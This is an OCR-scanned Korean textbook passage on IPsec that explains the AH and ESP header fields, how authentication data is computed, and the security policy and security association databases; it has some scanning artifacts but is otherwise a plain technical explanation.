^ 자료의 완전성 : 인증을 담당하는 코드에 의해 계 산된 매 개 마당의 더한 값을 수신 
자가 확인함으로써 보장한다. 

cr 자료의 인증 인증시 필요한 열쇠와 인증알고리듬을 SA 와 련동하여 지정하고 지정 
된 알고리듬을 수행 함으로써 실현한다. 

③ 재연방지 : AH 에 있는 순차 ( sequence ) 번호마당값을 유일번호화함으로써 실현한다. 

AH 실 현 방법에 는 보안관문에 서 실 현 하는 방법 과 IP 데 이 터그램 의 점대 점 사용자 (송신 
자와 수신자)사이에서 실현하는 방법이 있다. 그러나 방화벽을 사용하는 환경에서는 내부 
망의 안전성 이 보장되는것을 전제로 하기때문에 방화벽 이 수신자 혹은 송신자의 기능을 담 
당할수 있도륵 VPN 을 구현 할수도 있 다. 내 부망의 한 호스트에 서 외 부에 존재 하는 망에 통 
로를 구성하여 보안을 유지 하는 경 우 AH 는 전송되 는 데 이 터 그램 의 중요성 을 고려하여 실 
현되여 야 한다. 

례를 들면 보안의 민감도 (Security Sensitivity Level ) 가 매우 높은 경우 AH 에 관련 
된 SA 를 선택하는 과정 에 관한 보안이 더 욱 철저 히 이 루어져 야 한다. 철저한 보안을 위 
해 IPsec 에서는 IPv 6 를 적용하는 모든 호스트는 적어도 128 bit 의 MD 5 를 사용하는 AH 
를 실현하는것을 필수 요구조건으로 규정하고있다. IPv 4 에서는 명시적으로 민감도를 표 
시 하며 IPv 6 에서는 암시적 인 표시 방법 을 사용한다. 필요한 경 우 AH 가 제공하는< ᄆ 1 •시적 
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인 표시에 덧붙여서 사용자가 명시적으로 민감도를 표시할수도 있다. 즉 명시적인 표시를 
꼭 실현해 야 하는것 은 아니지만 암시적 인 표시 에 덧 붙여 서 명시적 인 표시 를 제 공하는 기 
능을 첨가할것을 요구한다. 단지 명시적인 표시가 사용된 경우에는 인증자료계산에 반드 
시 포함되여 야 한다. 

인증알고리듬에는 대칭형과 비대칭형 알고리듬이 있다. 대칭형 알고리듬을 사용하는 경 
우와 중간에 인증이 필요한 경우 매 인증쌍마다 같은 열쇠를 가져야 하는데 인증을 수행 
하는 체계에 이 열쇠의 쌍들을 전부 보관해두는것은 실질적으로 불가능하다. 그러므로 인 
증을 할 때 그 체계에 열쇠관리기구를 리용하여 적절한 열쇠가 제공되여야 한다. 또한 이 
러 한 경우 공격 자가 송신자와 수신자사이 에 지 나가는 자료를 얻 고 자료흐름을 분석 하여 자 
료를 수정하는 등의 침 입을 당할 가능성 이 높으므로 위험한 측면도 있다. 따라서 AH 를 실 
현하는 경우에는 아래 에 설명되는 비대칭 인증알고리 듬을 리용한다. 

비대 칭 인증알고리 듬이 적 용되는 경우 만일 경 로상의 경 로기 가 공개열쇠와 알고리듬을 
알고있으면 이것을 리용하여 정상적으로 인증을 하지 않는 모든 파케트를 검증할수 있다. 
방화벽에 서의 VPN 실현을 위해서는 비대칭인증알고리듬이 적당하며 사용되는 비밀열쇠 
와 인증알고리듬은 SA 의 선택과 함께 결정된다. 

AH 를 사용함으로써 종단 체계에 대해 IP 통신규약의 처리비용이 증가되게 되여 통신 
이 지연될수 있으므로 성능저하의 문제를 심각하게 고려하여야 한다. 이것은 대부분 인증 
정보의 계산 및 처리에 소요되는 비용때문이다. 성능저하에 대한 뚜렷한 규정사항은 여기 
서 론의하지 않지 만 심 각한 성 능저 하는 실제 적 인 사용을 저 해하는 요소가 된다. 따라서 성 
능상의 리유로 인증기능을 지 원하지 않는 체 계는 인증자료를 무시할수 있는 기 능이 첨 가 
되 여 야 한다. 

一 열쇠관리와 AH 의 구조 

AH 의 열쇠 관리 는 안전한 정 보보호를 위해 가장 필수적 인 요소중의 하나이 다. IP 는 열 
쇠관리 기 구와 보안통신규약기 구를 독립 적 으로 실현하려 고 노력 하고 있으며 두 기 구사이 의 
련관은 SPI(Security Parameter Index ) 만을 통해서 이루어 진다. 따라서 여 러 가지의 열 
쇠관리규약이 자유롭게 리용될수 있을뿐아니라 동적으로 수정되거나 교체될수 있어야 한 
다. 열쇠 관리기 구는 매 개 SA 파라메터 와 협 상하기 위해 사용되 며 열쇠 뿐아니 라 암호알고 
리듬，알고리듬의 방식，비밀등급 등의 정보까지 포함한다. 열쇠관리기구는 일반적으로 매 
SA 와 련관된 몇 가지 파라메터를 론리표에 저 장하고 이것을 통하여 어떻게 AH 알고리 듬이 
선택되고 사용되는지를 알수 있도륵 지원한다. 

AH 는 매 경로기의 IP 계층에서 검색되는 데이터그램부분과 검색되지 않는 다른 부분 
사이 에 위 치 한다. IANA(Internet Assigned Numbers Authority ) 에 서 AH 를 나타내 기 위 
해 번 호 51을 지 정하였 기 때 문에 AH 바로 앞부분의 머 리 부는 IPv 6 인 경 우 Next header 
마당。>斗 IPv 4 인 경우 Protocol 마당 ( IPv 4) 에 51 이라는 값을 가지게 된다. 

德 
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一 AH 의 구성마당과 통신규약 

AH 의 마당과 특징은 다음과 같다. 

d Next header : 8 bit 의 길이를 가지며 인증페이로드 ( payload ) 다음에 올 페이로드 
의 류형을 나타낸다. 

③ ( Payload ) Length ： 8 bit 의 길 이를 가지며 32 bit 단어길 이의 인증자료령역의 길 이 
를 나타내며 AH 길이에서 2를 뺀 값을 넣는다. 최소값은 0으로 NULL 인증알고리듬이 사 
용되는 경우를 나타낸다. 

n Reserved : 16 bit 의 길 이를 가지며 앞으로의 사용을 위 해 남겨 둔 마당이 다. 전송 
될 때 반드시 모두 0으로 채워져 야 한다. 자료인증의 계산에 포함되지 만 그렇지않다면 수 
신자 AH 적 용전과 적 용후의 IPv 4 와 IPv 6 AH 마당에 의해 무시 된다. 

^ Security Parameters Index ( SPI ) : 데 이 터 그램 을 위 한 SA 를 식 별 하기 위 한 32 bit 
의 란수값이 다. 어 떤 SA 도 존재하지 않는 경 우에 만 0의 값을 가전 다. 1부터 255까지 는 앞 
으로의 사용을 위해 IANA 에 예약되여 있다. 예약된 SPI 값들은 일반적으로 RFC 에 의해특 
별 히 지 정 된것 들에 의하여 IANA 에 서 지 정한다. 

n Sequence Number ： 동일 한 SPI 를 리 용하여 보내 진 파케 트의 유일 번호를 나타낸 
다. 전송되 는 파케 트들을 구별 하고 얼 마나 많은 파케 트가 동일 한 SPI 를 리용하여 보내졌 
는지 나타낸 다. 수신즉에 서 득정 한 SA 에 대 해 재 연방지 봉사를 선택 하지 않아도 반드시 제 
공되여야 한다. 유일번호는 SA 를 협상할 때 송신자와 수신자가 모두 0으로 초기화되며 재 
연방지봉사 ( default ) 를 선택하였을 때 에는 유일번호가 겹 치지 않도륵 하기 위하여 최대 유 
일번호까지 사용한 후에 새로운 SA 와 열쇠를 다시 협상하여야 한다 

n Authentication Data : 길이는 가변적이지만 32 bit 단어의 배수이다. 많은 실현에 
서 성능향상을 위하여 SPI 상의 수신자에 의해 제시된 다른 단위의 자료정 렬을 기준으로 채 
우기 ( padding ) 이 이 루어 지 며 이 러 한 채 우기 는 필수적 으로 지 원되 여 야 한다. 채 워 지 는 마 
당의 값은 송신자에 의해 임의 로 선택되 고 인증자료계산에 포함된다. 

일 반적 인 인증머 리 부의 실현은 마당의 크기 와 사용을 명 시하는 SA 를 선택 하기 위하 
여 목적지주소와 SPI 를 사용하는데 이러한 마당은 지정된 SPI 와 목적지주소에 해당하는 모 
든 데이터그램들에 대해서 동일한 형식을 유지하여야 한다. 인증자료는 SPI 마당의 직후 
에 위치하며 인증자료마당이 실제 인증자료보다 긴 경우에는 사용되지 않는 마당의 일부 
분은 그 실현에 의존적인 값들로 채워전다. 

一 인증자료의 계산과정 

IP 인증자료계산을 위해서는 암호학적으로 강력한 한방향함수라고 믿을수 있는 알고 
리 듬만이 사용되 여 야 한다. CRC -16 과 같은 관용적 인 더한 값을 사용하는 알고리 듬은 암 
호학적 으로 강력하지 않기 때 문에 사용되 면 안된다. 일 반적 으로 MD 5 와 같은 요약 ( digest ) 
알고리듬이 사용된다. 그리고 송신측에서의 파케트처 리과정은 다음과 같다. 
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u SA 선택 

외부로 나가는 IP 파케트를 처 리할 때 전송자가 우선적으로 할 일은 적절한 SA 를 선 
택하는 일 이 다. SA 는 한방향성을 가지며 전송되는 IP 파케트에 SA 의 식 별을 위해 적 어도 
송신자와 목적지의 주소가 포함되 여 야 한다. 호스트기 초의 식 별자를 사용하면 송신지의 모 
든 사용자는 특정 한 송신지 에 대 해 동일 한 SA 를 공유한다. 사용자기 반의 식 별 자를 사용 
하면 매개 사용자，심지어는 응용프로그람까지도 서로 다른 SA 를 사용할수 있다. 이때 선 
택된 SA 는 전송되는 파케트에 적용될 알고리듬，알고리듬방식，열쇠，그 외의 보안과 관 
련된 사항들을 포함한다. 

^ 유일번호의 생성 

송신자는 현재 사용하고있는 SA 의 순차번호를 증가시키 고 그 값을 AH 의 Sequence 
Number 마당에 삽입 한다. 

^인증자료값의 계산 

인증정 보는 인증에 참여하는 송신자와 수신자간에 합의된 인증함수와 열쇠 에 의해 계 
산되 며 계 산의 입 력자료로는 IP 데 이 터그램 의 마당중에 서 송신도중에 변화하지 않는 모든 
마당과 전송도중에 변화되지만 송신측에서 예측가능한 마당들이 포함된다. 단지 송신도중 
에 변하는 마당들가운데서 예측이 불가능한 마당은 실제값과 상관없이 0으로 하여 계산 
하고 예측가능한 마당은 송신측에서 예측한 값으로 넣고 계산한다. 0으로 계산되는 마당 
의 실례 로는 IPv 4 에 서 는 TOS(Type of Service ) , Flags , Fragment Offset , TTL(Time to 
Live ) 과 HEADER CHECKSUM 마당이고 IPv 6 에 서 는 Class , Flow Label , HOPLIMIT 
이다. IP 에 포함되는 AH 의 인증자료마당의 값 역시 0으로 처리된다. IPv 4 에서는 전송도 
중 변하는 옵션마당을 구별하는 기구가 없기때문에 매 옵션에 대해서 변하는것，변하지만 
예측가능한것，변하지 않는것으로 구분하여 인증자료계산에 사용한다. IPv 6 의 경우 Optkm 
type 마당의 상위 세번째 비 트는 옵션자료가 인증자료계 산에 포함될것 인가를 나타내 기 위 
하여 사용되며 만일 이 비트가 0이면 해당 옵션이 인증자료계산에 포함되고 1이면 옵션 
과 같은 길이의 0으로 간주되여 계산된다. 어떤 옵션이든 전송도중에 변하는것 이 라면 Option 
Data 마당은 모두 0으로 놓고 Option Type 과 Opt Data Len 은 그대로 인증계산에 사용 
된다. 나머지 옵션을 가지지 않은 확장머리부들은 IPv 4 와 같이 변하는것과 변하지만 예 
측가능한것，변하지 않는것으로 구분해놓았다. 

一 AH 의 구성 

송신자는 통보요약알고리 듬으로 계산된 결과를 AH 내의 인증자료마당에 삽입한다. 이 
러한 AH 의 구성은 송신자가 인증된 IP 파케트를 송신하기 직전에 수행된다. 

H 단편화 

전송방식인 경우 AH 는 IP 조각이 아니라 IP 데이터그램들에 대해서 적용된다. 즉 AH 
처리이>에 발생한다. AH 가 적용된 IP 파케트들은 경로기에 의해서 단편화될수 있고 수 
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신측에서 AH 처리가 이루어지기전에 재조립을 먼저 해주어야만 한다. 

통로방식 인 경우 AH 는 단편화된 IP 파케트에 적용한다. 

또한 수신자가 IP AH 가 포함된 파케트를 수신하면 목적지주소， SPI, AH/ESP 여부 
에 따라 SAD 로부터 해 당하는 SA 를 찾는다. 유효한 SA 가 존재 하지 않으면 페 기 하고 검 
열기록을 남긴다. 수신측에서의 처 리과정을 살펴보면 다음과 같다. 

n 유일번호검증 

만약 수신자가 재연방지봉사를 선택하지 않았다면 이 절차를 거치지 않아도 된다. 그 
외의 경우 한 SA 상에서 중복되는 유일번호가 쓰였는지에 대해 받는 과케트마다 유일번호 
를 검사하여 야 한다. 

^인증자료의 검증 

수신자는 독립 적 으로 인증자료령역 과 수신된 파케 트가 변하지 않았는가를 검 증한다. 여 
기 서 다시 인증자료령역 의 값과 송신자가 0으로 처 리 한 마당의 값을 0으로 간주하고 인 
증계산을 한다. 명 확한 과정 은 알고리 듬의 구현에 따라 다르나 사용된 인증알고리듬에서 데 
이터그램이 유효하다고 인정된 경우 그 파케트를 통과시킨다. 이때 방화벽을 통과하는 파 
케트는 IPsec 를 적용하기 이전의 과케트형태를 가전다. 

만일 인증절 차가 실패하면 수신자는 파케 트를 제 거 하고 인증실패 의 기 록을 체 계 로그 
나 검 열로그에 기 록해 야 한다. 이 리 한 기 록에는 기 본적 으로 SPI 값과 수신된 날자와 시 간， 
평문으로 된 원천지주소와 목적지주소，그리고 존재하면 평문의 흐름식별자 (flow ID) 를 반드 
시 포함해야 한다. 이외에도 실현에 따라 필요한 다른 정보를 기록파일에 포함할수도 있다. 

一 AH 실현시 고려사항 

보안의 정도는 사용되는 암호알고리듬의 실현과 사용된 열쇠의 보안，알고리듬실현의 
정확도，열쇠관리기구와 알고리듬，머리부의 정확한 실현 등에 달려있다. 따라서 기밀성 
이 중요시되는 경우에는 다음에 설명되는 ESP 알고리듬이 사용될수 있으며 경우에 따라서 
는 AH 와 ESP 이 혼합되 여 사용될수도 있다. 

경로기나 호스트가 ICMP 파케트를 사용하여 망상의 오유를 전달하는 경우 ICMP 규약 
이 허 용하는 파케 트의 크기 가 너 무 작아서 문제 가 발생 할수 있 다. 이 경 우에 는 수신자가 독 
립적 으로 이 려 한 파케 트를 인증하는것 이 불가능하므로 인증없 이 ICMP 파케 트를 믿 어 야 한 
다. 그렇지않으면 합법 적 인 파케 트를 믿지 않게 되며 적 당한 반응을 기 대할수 없게 된다. 
동일한 문제는 암호화된 파케트가 ICMP 파케트를 발생하고 그 파케트가 절단될 때에도 일 
어나는데 무작정 믿어 야 하는것은 보안상 또 다른 문제를 야기시 킬수도 있다. 

이밖에도 인터네트에서는 인증되지 않은 원천지 경로조종과 같은 적극적인 공격의 형 
태가 나타나고있는데 이러한 공격은 보안의 심각성을 더해준다. 따라서 이러한 경우들을 방 
지 하기 위해 AH 와 함께 다른 암호기 구가 적 극적 으로 사용되 여 야 한다. 
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2) ESP (Encapsulation Security Payload ) 

一 ESP 의 개념 

ESP (Encapsulation Security Payload ) 는 암호화수법 을 사용하여 자료의 완전성，재 
연방지，기밀성의 기능을 제공하는 통신규약이다. 사용하는 암호알고리듬의 형래와 방식 
에 따라 인증기능까지도 제공할수 있다. 그러 나 자료흐름분석을 통한 공격에 대한 보호와 
부인봉쇄는 제 공되지 않는다. 부인봉쇄 등의 다양한 보안봉사를 위해서 AH 와 혼합하여 사 
용되기도 한다. 

ESP 의 기본적인 개념은 보호될 자료를 암호화하여 ESP 머리부와 ESP 꼬리부를 앞뒤 
에 붙이고 ESP 머 리부앞에 IP 머리부를 추가하는것 이다. 보호되는 자료는 방식에 따라 전 
달계층의 토막 ( segment ) 혹은 전체 IP 데이터그램이 될수도 있다. 전달계층의 토막을 보 
호하는 전달방식에서는 IP 파케트부분가운데서 전송층머 리부의 바로 앞에 ESP 머 리부가 위 
치 한다. IP 데 이 터 그램전체 를 보호하는 통로방식 ESP 의 경 우에 는 IP 데 이 터 그램 이 ESP 페 
이로드의 암호화된 부분으로 삽입 되 며 전체 ESP 프레 임 이 새 로운 평문의 IP 머 리 부 다음 
에 위치 하게 된다. 새로운 평문 IP 머리부가 필요한 리 유는 경로조종과정을 거치는 동안 IP 
머 리 부의 정 보가 필 요하기 때 문이 다. ESP 머 리 부와 ESP 페 이 로드사이 에 평문의 IP 경 로조 
종머 리부가 삽입될수도 있다. 

ESP 는 이러한 보안기능을 제공하는 우점이 있는 반면에 IP 통신규약처리비용과 통신 
지 연이 증가한다는 결 함이 있 다. 지 연이 증가하는 주되 는 리 유는 ESP 페 이 로드를 포함한 매 
데 이 터그램을 암호화，복호화하는 과정때문이다. 따라서 ESP 구현시 성능향상을 심중하 
게 고려하여 야 한다. 


— 열쇠관리와 ESP 의 구조 

AH 의 경 우와 마찬가지 로 ESP 에 서 열 쇠 관리 는 안전한 정 보보호를 위해 가장 필수적 
인 요소중의 하나이 다. IP 는 열쇠 관리기 구와 보안통신규약기 구를 독립 적 으로 실현하며 두 
기구사이의 련관은 SPI(Security Parameter Index ) 만을 통해서 이루어진다. 따라서 여 
러가지 의 열쇠 관리통신규약이 자유롭게 리용될수 있을뿐아니 라 동적 으로 수정 되거 나 교체 
될수 있어야 한다. 

열 쇠 관리 기 구는 매 개 SA 의 파라메 터 를 협 상하기 위 해 사용되 며 열 쇠 뿐아니 라 암호알 
고리 듬，알고리 듬의 방식，비 밀 등급 등의 정 보까지 포함한다. 열 쇠 관리기 구는 일 반적 으로 
매 SA 와 련관된 몇 가지 파라메터를 론리표에 보관하고 이것을 통하여 어 떻게 AH 알고리 
듬이 선택되고 사용되는가를 알게 된다. 

ESP 는 IP 머리부와 전송층 토막사이의 어디에서나 나타날수 있다. IANA 에서 머리부 
를 나타내 기 위해 통신규약번 호 50을 지 정하였 으므로 ESP 바로 앞부분의 머 리 부는 Next 
Header 마당 ( IPv 6) 이나 Protoc 이마당 ( IPv 4) 에 50 이라는 값을 가지게 된다. 

암호화되지 않은 부분과 암호화된 부분이 련속적으로 나타나며 암호화된 부분 
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은 보호되 여 야 하는 자료(통로방식 의 경 우 전체 IP 데 이 터 그램이 며 전송방식 의 경 우 전송 
층의 토막)와 ESP 꼬리 부로 되 여있 다. 

一 ESP 구성마당의 구조와 통신규약 

ESP 를 구성하는 매개 마당의 정의와 사용목적은 다음과 같다. 

u SPI (Security Parameters Index ) 

SPI 는 32 bit 의 우연수값을 가지 며 IP 데 이 터그램 에 대 한 SA 를 식 별 하기 위 해 목적 지 
IP 주소，보안통신규약과 함께 사용된다. IP 데 이 터그램 을 위한 SA 가 존재하지 않으면 SPI 
의 값은 0이 사용된다. SPI 의 값 0 X ()1 부터 0 XFF 은 앞으로 사용을 위해 IANA 에 의해 예 
약되 여 있다. 이 값들은 RFC 에 명시될 때 IANA 에 의해 사용되게 되 여있다. 

^ Sequence Number 

동일한 SPI 를 리용하여 보내진 파케트의 유일번호를 나타낸다. 전송되는 파케트들을 
구별하고 얼마나 많은 파케트가 동일한 SPI 를 리용하였는지 나타낸다. 이 마당의 값은 재 
연공격 을 방지 하기 위해 사용될수 있 다. 

u Payload Data 

파케 트에 의해 전송되 는 실제자료이 다. 

u Padding 

0부터 255 byte 길이의 자료이다. 암호화알고리듬에서 자료의 길이가 단위 길이의 정수 
배가 되여야 하는 경우 나머지 공간을 채우기 위해 사용되거나 평문을 32 bit 경계선에 맞 
추기 위해 또는 전송도중 실제 자료의 크기 가 얼마나 되 는지 공격 자들이 예 측할수 없도록 하 
기 위해 사용된 다. 

u Next Header 

IP 의 Next Header 와 마찬가지 로 자료의 류형 이 나 웃준위 통신규약의 종류를 나타낸다. 

^ Authentication Data 

이 마당은 옵션으로 ESP 파케트에 대한 인증봉사를 지원하는 경우 포함된다. 길이는 가 
변적 이 고 SA 에서 협 상된 인증함수에 의해서 명시된다. AH 에서 의 인증과 다른점은 인증 
되는 령역 이다. 

— ESP 의 수행과정 

ESP 를 수행하는 방법은 앞에서 설명 한 바와 같이 보호하려는 파케트의 내용에 따라 ESP 
내 의 IP 데 이 터그램 전체 를 교갑화하는 통로방식 과 전송층의 프레 임 을 교갑화하는 전송층 
방식으로 분류된다. 

3) 보안관련설정 (Security Association : SA ) 

SA 는 AH 와 ESP 머 리 부처리 를 위해 필요한 정 보를 포함하며 보안관련 자료기 지 
(Security Association Database ： SAD ) 안에 하나의 입 구 ( entry ) 로 존재 한다. 매 
가지 의 보안봉사를 제 공하며 ESP 와 AH 를 함께 제 공하려 는 경 우 두개 의 SA 를 사용 
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다. SA 는 SPI , 목적지의 IP 주소， AH 인가 ESP 인가의 여부에 따라 유일하게 결정된다. 

SA 는 전송방식과 통로방식의 두가지 형태로 정의된다. 호스트는 반드시 전송방식과 통 
로방식을 모두 지 원해 야 하며 보안관문은 동로방식만 지원하면 된다. 관문이 호스트와 동 
일한 동작을 하는 경우에는 전송방식을 지원할수 있다. 

SA 에 의해 제공되는 보안봉사는 선택된 보안통신규약 ， SA 량단의 위치，통신규약내 
에서 의 추가적 인 봉사에 의존한다. 이 리 한 SA 는 한방향접속을 위한것 이므로 전형 적 인 두 
말단간의 쌍방향통신을 위해서는 두개의 SA 가 필요하다. 

SA 와 관련된 매개 변수들을 포함하는 자료기지로는 보안방책자료기지 ( SPD ) 와 SA 자 
료기지 ( SAD ) 의 두가지로 볼수 있다. 

一 보 안방책 자료기 지 : SPD (Security Policy Database ) 

SPD 는 보안관문의 객체 에서 입 력 혹은 출력 되 는 모든 통과량에 대 한 보안과 열쇠관 
리통과량을 포함하여 IPsec 체 계 를 통한 모든 통과량의 흐름을 관리하는데 사용된 다. SA 
는 IPsec 환경 에 서 보안방책 을 적 용하기 위한 관리 구조라고 할수 있 다. SPD 는 IP 데 이 터 
그램 에 어 떤 보안봉사를 어 떤 방법 으로 제 공할것 인지 를 나타내 므로 SA 를 적 용하기 위해 
서는 필수적이다. 모든 통과량이 SPD 를 참조하도록 하기 위해서는 입력 혹은 출력 통과 
량을 위한 별도의 요소가 필요하다. 이것을 분리된 SPD 로 실현할수도 있으며 IPsec 처 리 
가 가능한 망대면부마다 또 다른 SPD 가 필요하다. SPD 에서 데이터그램을 처리하는 방 
법으로 다음의 세 가지가 있다. 

^ 데 이 터 그램 을 제 거하는 경 우: 호스트를 통과하지 못하도록 정 해 진 통과량에 적 용 
한다. 

i 〒 데이터그램을 통과시키는 경우: 부가적인 IP sec 의 보호가 필요없이 통과하도록 허 
용된 통과량에 적용한다. 

cr 데이터그램에 IP sec 를 적용하는 경우: IPsec 를 리용하여 보호할수 있는 경우에 적 
용하며 이 런 경우 반드시 SPD 는 제공될 보안봉사，사용될 통신규약，사용되는 알고리듬 
을 명시해 야 한다. 

IPsec 실현에 는 SPD 를 관리할수 있는 관리대 면부가 반드시 필요하다. 보다 명 확히 말 
하면 호스트 (또는 보안관문) 로 들어오거 나 나가는 파케 트들중에 서 IPsec 처 리 와 SPD 참조 
가 필요한 파케트들에 대 해 매 경 우 어떤 처 리를 해 야 할지 명시해 야 한다. 그렇게 해서 사 
용자나 관리자는 체계로 들어오거나 나가는 파케트단위로 적용할 보안처리를 명시할수 있 
다. SPD 관리대면부는 다음 설명되는《선택자》와 동시성을 유지하는 객체를 만들수 있 
도록 이 개 체 들은 반드시 순서 를 유지 해 야 한다. 

SPD 는 방책요소들의 정 렬된 목록을 포함한다. 매 방책 요소는 그 방책 에 의해 포함 
되는 IP 통과량의 모임을 결정하는 하나이상의 선택자로 구성된다. 이들은 방책이나 SA 

g l •항을 정한다. 매 요소에 는 방책 에 맞는 통과량을 처 리하는 방법 으로 우에 서 언 
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급한 바와 같이 데이터그램을 통과시킬것인가 아니면 버릴것인가 혹은 IPsec 을 적용할것 
인가에 대 한 지시를 포함한다. IPsec 가 적용되는 경우라면 방책입구는 사용될 IPsec 통신 
규약，방식 이 나 알고리 듬 등의 SA 의 세 부사항을 포함한다. 방책입 구는 매 선택 자에 대 해 
SPD 나 파케트안의 값들로부터 새 로운 SAD 요소의 값들을 어떻게 채울것 인가를 명시한다. 

SPD 는 통과량을 특정 SA 나 SA 의 모임 에 설정 하기 위해 사용될수도 있 다. 즉 SPD 
는 보안방책을 위 한 참조자료기지 이면서 동시 에 이미 존재 하는 SA 로 설정 하는 역 할도 한 
다. 선택 자 ( selector ) 는 보안방책 을 통과량에 적 용시 키 기 위 해 SPD 가 사용하는것 으로써 IP 
층이 나 그보다 웃층의 통신규약령역 의 값들의 집 합이 다. 선택 자에 따라 SA 가 세 부적 이거 
나 그렇지 않을수 있다. ESP 머 리부로 교갑화된 파케트는 암호화나 단편화때문에 전송계 
층 통신규약，전송지 나 목적지의 포구번호 등이 OPAQUE 일수도 있다. 아래 에 렬거되는 선 
택 자파라메 터 는 SA 관리 를 위 해 필 수적 으로 지 원되 여 야 한다. 

^ 목적지 IP 주소 ( IPv 4 나 IPv 6) 

이 목적지 IP 주소는 단일주소(점대점뿐아니라 방송주소 포함)，주소범위，주소 + 마 
스크” 혹은 와일드카드의 주소형태를 가질수 있다. 특히 마지막 세가지 형태는 동일한 SA 
를 사용하는 여 러개의 목적지체 계 가 있는 경우에 사용될수 있다. 

SA 를 식 별 하기 위 해 SPI 와 결 합하여 쓰이 는 〈Destination Address , IPsec Protocol , 
SPI 〉 에 서 의 IP 목적 지 주소와는 개 념 적 으로 다른것 이 다. 파케 트가 종단점 에 도착하면 그 파 
케트의 목적지 IP 주소， SPI , 통신규약을 기준으로 SAD 에서 알맞은 SA 를 찾아낸다. 이때 
사용되는 목적지; [ p 주소는 교갑화 IP 머리부에서 추출된다. 

巧 원천지 IP 주소 ( IPv 4 나 IPv 6) 

원천지 IP 주소는 단일주소(점대점뿐아니라 방송주소 포함)，주소범위，주소 + 마스크， 
혹은 와일드카드의 주소형태를 가질수 있다. 특히 마지막 세가지 형태는 동일한 SA 를 사 
용하는 여러개의 목적지체계가 있는 경우에 사용될수 있다. 

巧 이름 

사용자식별자나 체계이름이 사용자용으로 리용될 때의 사용자 ID ， 혹은 호스트기초 
로 사용될 때의 체계이름의 형태로 분류된다. 사용자 ID 는 DNS 에서 인식되는것과 같은 체 
계 나 사용자이름의 결합형 이 나 X . 500에서 제 안하는 류형 으로 사용되 고 체 계이름은 역시 
DNS 이름인 인터네트주소 혹은 X . 500에서 제안하는 형태로 사용된다. 

巧 자료중요도 

자료의 중요한 정 도를 표시 하는 수자로서 정 보흐름보안 (information flow security ) 
을 제 공하는 모든 체 계 에 서 는 필 수적 으로 실 현되 여 야 하지 만 나머 지 체 계 에 서 는 필 수적 이 아 
니 다. 

@ 전송층통신규약 

IPv 4 의 《통신규약》령역이나 IP v 6 의 《Next Header 》 로부터얻어진다.。;^은 매 
개의 통신규약번호일수도 있다. ESP 머리부가 불은 파케트를 받은 경우 전송층통^^ 
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유용하지 않을수도 있으므로 〈〈 OPAQUE 》 가 지원되여야 한다. 

CT 원천지와 목적지 포구 

UDP 나 TCP 포구값이거 나 와일드카드 포구값이 다. ESP 머 리부를 사용한 파케트의 경우 
에는 원천지와 목적지의 포구번호가 리용되지 않으므로 ’ OPAQUE ’ 형태가 지원되여야 한다. 

—보안관련자료기지 (Security Association Database : SAD ) 

매 SAD 의 요소에 는 해 당한 SA 에 관련된 매 개 변수들이 정 의 되 여있 다. 즉 하나의 SA 
는 SAD 의 하나의 요소에 넘겨진다. 또한 송신파케트처리를 위해서는 SPD 의 요소가 SAD 
의 요소로 넘 겨 진 다. 이 때 송신되 는 파케 트를 위하여 SPD 가 SA 의 요소를 발견하지 못하 
면 적합한 SA 의 요소가 생성되도록 실현되여야 한다. 수신되는 파케트를 위해서는 목적 
지 IP 주소， IPsec 통신규약 류형， SPI 를 기준으로 요소가 찾아전다. 

다음은 수신되 는 파케 트들의 처 리 에서 SAD 안의 SA 를 찾아내 기 위해 리용되 는 마당 
들이 다. 

ᄄ 외부 머리부의 목적지 IP 주소 

IPv 4 혹은 IPv 6 에서 사용되는 IP 주소 

n IPsec 통신규약 

SA 참조를 위해 사용될 통신규약으로서 AH 혹은 ESP 중의 하나이 다. 

@ SPI 

32 bit 길이의 값으로 동일한 목적지에서 같은 IPsec 통신규약을 사용하는 SA 들을 구별 
하기 위해 사용된 다. 

IPsec 처리를 위해서는 SAD 에 다음의 마당들이 필요하다. 

u Sequence Number Counter 

32 bit 값으로 AH 나 ESP 머 리 부의 순차번호마당의 값을 생 성하기 위해 사용한다. 모든 
실현에 필수적 이지 만 송신되는 통과량에만 사용된다. 

u Sequence Counter Overflow 

Sequence Number Counter 가 자리 넘침 인지를 나타내는 기발로서 자리넘침이 일어나 
면 검열기록을 남겨 야 하며 해 당 SA 를 사용하여 계속 파케트를 보내지 못하도록 해 야한 
다. 모든 실현에 필수적이지만 송신되는 통과량에만 사용된다. 

^재연방지창문 

수신되 는 AH 나 ESP 파케 트가 재 연된것 인지 의 여 부를 결정 하기 위해 사용되 는 32 bit 
의 계수기 이다. 모든 실현에 필수적 이지 만 수신되는 통과량에만 사용된다. 

@ AH 인증알고리듬，열쇠 : AH 실현에만 필수적이다. 

@ ESP 암호화알고리듬，열쇠， IV 방식 : ESP 실현에만 필수적이다. 

^ ESP 인증알고리듬，열쇠 : ESP 에서 인증이 필요한 경우에만 선택되며 그렇지 않 
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^ SA 의 수명 : SA 가 새로운 것으로 교체되거나 폐기되여야 하는 시간간격과 교체나 
페 기 중에 어 떤 처 리 를 해 야 할지 를 나타낸 다. 시 간이 나 byte 계 수기 또는 그 두가지 를 동 
시 에 사용하여 표현할수 있 다. 실현에 서 는 두가지 류형 의 수명표기 와 동시 사용이 가능하 
도륵 지원하여야 한다. 어떻게 열쇠를 재설정하고 언제 SA 를 페기할것인지는 실현에 의 
존적이다. 모든 실현에는 필수적이다. 

^ IPsec 통신규약 방식 

통로방식，전송방식 혹은 와일드카드로 표현된다. 원천지에서 이 마당이 와일드카드 
인 경우 응용프로그람은 IPsec 실현에 어떤 방식 인지를 알려야 한다. 이 렇게 와일드카드를 
사용하는것은 같은 SA 에 대 해 파케트단위 로 통로방식으로 사용할수도 있고 전송방식으로 
도 사용할수 있게 한다. 호스트상에서 실현하는 경우 모든 방식을 반드시 지원해야 하며 관 
문에서 실현하는 경우 통로방식만 지원한다. 

수신 SA 의 통신규약 방식에 와일드카드를 리용하며 수신호스트에 혼란을 가져올수 있 
다. 이 경우 응용프로그람이 방식에 대한 정보를 얻을수 있는 기구가 필요하다. 

@ Path MTU 

모든 IPsec 실현에서 필수적 이지 만 송신통과량에만 사용한다. 

SAD 에는 처음 SA 가 생성될 때 협상되 었던 초기값들이 반드시 포함되 여 있어 야 한다. 
송신자는 이 값을 리용하여 주어진 SA 가 줄력되는 파케트에 사용하기에 적당한가를 결정 
한다. 이것은 사용될 SA 가 존재하는지 확인하는 과정의 일부이 다. 수신자는 SA 의 값과 입 
력 파케 트의 값들이 일 치하는지 확인하는데 사용한다. 이 과정 은 SA 가 처 리하는 파케 트를 
